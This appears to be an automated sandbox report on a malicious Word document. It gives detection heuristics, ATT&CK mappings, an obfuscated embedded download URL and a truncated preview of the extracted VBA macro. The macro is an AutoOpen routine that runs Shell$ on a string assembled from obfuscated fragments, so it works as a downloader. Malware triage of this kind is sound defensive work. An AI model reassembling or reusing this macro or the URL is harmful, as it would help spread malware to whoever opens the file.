MALICIOUS
244
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing a malicious VBA macro. The AutoOpen macro executes a Shell() command, which is a common technique for downloading and executing further malicious content. The obfuscated script and the presence of a suspicious URL suggest a downloader or droppper functionality.
Heuristics 8
-
ClamAV: Doc.Macro.Obfuscation-6355576-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://KM5+KM5www.1001KM5+KM5parfuKM5+KM5mz.ru/lKM5+KM5jBfKS8i+S8iM5+KM5i/,KM5+KM5htKM5+KM5tp://KM5+K In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 211698 bytes |
SHA-256: ab35ab23504309c8a3a1489cce74daf88ab8352428ab0298ed968275ca693555 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 64 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "foVjtrtuI" Sub AutoOpen() EUzLFYXYi = "utbXRtzqv" + "inEUSiFKP" + "AENPTAYGm" + "OcbMmvbhR" Shell$ XrbNVPkQN, 0 sitiUnkZo = "PkCVFvJXU" + "RfZbzLHjN" + "URAJtlNNf" + "VSjZiuMIW" End Sub Function XrbNVPkQN() GMHwqvaKzhY = "DiGIr7ah12AZ1XzikZdtQbsppDJjbIESIPYhwiWlHbpOqzhFiQwHdQaQVNAAMRsfVQtmwQfGCrmomdwqVDBLLwpspHMldVZpiKtaGvHOkqEldlisOrp4aTz8zcukCR" DQCBTEJswj = Mid(GMHwqvaKzhY, 14, 100) qMlKnT = Array(Array(12, 73, 14, 20), Array(64, 31, 64, 97)) SPwQXqkTP = Array(Array(55, 97, 38, 72), Array(19, 75, 77, 84)) RWYFFRI = Array(Array(33, 35, 24, 85), Array(76, 87, 30, 38)) dnDTSwr = "iwTkIU8qzVOBQjjvCzkhzDJNcCzwEuGhNizvMzNasppjADpwGIACqbMdKEcLbvlEOjomjkiDlKpJOZNZMAswuDqmRTlHWBwwDkVUODPVZwRD9H" jJjifLq = Mid(dnDTSwr, 8, 100) ZWIZmFqVFYS = Array(Array(90, 93, 41, 78), Array(47, 20, 10, 61)) focckajbEY = Array(Array(63, 51, 93, 69), Array(34, 88, 62, 12)) vTvRfKv = Array(Array(81, 90, 67, 17), Array(90, 18, 57, 35)) YojkWDOHdz = "muknJzIbSlSWbapADUdEojSYwjJloAzwGPzmbBYCFPlvTGWQYGibBCIzmLodoWmSoTQLdCYBwazZwWFrJsNiRVwEHzAQMuOjcSHzqLnVhhfbDizPuvlnIIVMfGzUi4WBOv79uHtSZdljr1zb8" LbnJPjVr = Mid(YojkWDOHdz, 3, 110) vnjSNFJo = Array(Array(90, 77, 63, 33), Array(66, 18, 44, 54)) VwwSp = Array(Array(59, 58, 84, 74), Array(17, 39, 50, 40)) HcuAGLJoI = Array(Array(90, 55, 20, 24), Array(12, 59, 87, 74)) wBWWqw = "KFzTvIEASWMDdBIoBMPzfPFBwFrAkpVAZAlKPbSbXSodiHJUZsiOnlTzAvVqQDPdBLidQzYauoZNacXqvXbsLHNohlKUFbKUCLcSdjDbUdtRGIjGAGSz" DKXiMlDjHRu = Mid(wBWWqw, 2, 104) IfRiDsLFmdt = Array(Array(67, 67, 78, 59), Array(63, 49, 43, 61)) qwSJGiGCmGw = Array(Array(63, 88, 28, 54), Array(39, 56, 85, 33)) RnYfiRTG = Array(Array(43, 89, 54, 60), Array(28, 86, 21, 13)) oalvqKCKwWp = "J1intHJZXOi6wAIfPutnqEMSazwjXYwBfpJXADvcquTAHHIrwnoVupWQUaUAjAqLshfXjiPumotPkLKTpFjkjaHpSsDZivwqEIHackHOXtjFE4IaHoF" dLiCdOq = Mid(oalvqKCKwWp, 22, 87) iVNFIdV = Array(Array(24, 68, 63, 32), Array(23, 68, 54, 13)) JUidTsa = Array(Array(51, 32, 44, 32), Array(65, 78, 32, 80)) ZtoZISYXG = Array(Array(66, 11, 62, 78), Array(31, 93, 74, 75)) WjnRzYzr = "ZKfMzG99ZRrpPIzz8ZUPlwHEVzVOJNiNlzuTdzIZcVEvPnzHXEfwjnFhMsCdSfnAKcdBzvmtdNMirMpiANqEhldzrNHlwiGwhEJdmkJUVOfVZiJiraWz" kAGfdjiwf = Mid(WjnRzYzr, 22, 77) wCGFozzvW = Array(Array(82, 34, 72, 91), Array(42, 10, 19, 69)) JqjhjzMSJn = Array(Array(98, 45, 37, 57), Array(98, 41, 10, 60)) RCFJL = Array(Array(59, 14, 45, 90), Array(45, 51, 93, 63)) pzkPqRSF = "HcmQtjlCPlrCzbDpJLpCUPzahjLsFdEsKJlWWwmKAODzQTCXtOaJiMizWwOhUtwljwsppjSLZfBFLzKNjowrCuOzalULzjh2XRjnOVzwsQv4" GLNFTUOj = Mid(pzkPqRSF, 6, 85) IQRAjLJW = Array(Array(37, 90, 46, 18), Array(94, 70, 47, 25)) hvltzFCqAR = Array(Array(79, 42, 53, 19), Array(43, 59, 73, 26)) mrRGDPzXs = Array(Array(76, 33, 35, 23), Array(15, 58, 43, 94)) TpCwjF = "FRWSrKFZ1lSI9fYmDbaa7AUzQfcFdUwYcntzNtpPwuPPtlmozS8rZtizrv27Q8" AYKZkFZ = Mid(TpCwjF, 27, 23) BTPfPiW = Array(Array(63, 34, 83, 42), Array(65, 94, 37, 14)) lLCbiwNwLj = Array(Array(67, 31, 75, 68), Array(95, 10, 39, 77)) GdMiNMkir = Array(Array(65, 61, 69, 16), Array(28, 34, 34, 16)) iCfhRzmtN = "iiUb1DWKnoEEtvQbfbcPWKhUKaicpdVzfABaHcUCAdoWjVVJFuMTPhulawcLXEQJSFYsuqTDGZOtVLkoFZWvRBjwGPzKAJfwMiDizcPPbJNqSBQPLnFwhVsRVamfqICwuRjqHGrdJHUIotfEwkzMEjPrmmIWpkYS9CSZJmdaA9DiA8Bz" aRftHm = Mid(iCfhRzmtN, 9, 152) qtSviwW = Array(Array(95, 87, 51, 69), Array(84, 68, 60, 21)) zPIaI = Array(Array(87, 71, 20, 79), Array(30, 83, 77, 14)) tpVkcP = Array(Array(59, 74, 10, 20), Array(24, 67, 41, 72)) HQanEYcd = "mmBMTPvipuNTVwSPpdQjGcjorfTQrwjCwCdfHEGQACiJzsYBlFOuYmNuBzatnJdwOLUTVmIlWAjDzaqzHSimildMpjiKdNdqZivmXFjwzdXYFKwaGbmUfrOchIilIwIJWpiPfDcBmfoEOFGimDDBbJLhUSEObumPm1tZVwIVuzYNUAOR" RZzJpUph = Mid(HQanEYcd, 10, 149) jznrZCaJDmc = Array(Array(67, 26, 45, 15), Array(73, 71, 37, 83)) OaXHOFWhfj = Array(Array(5 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.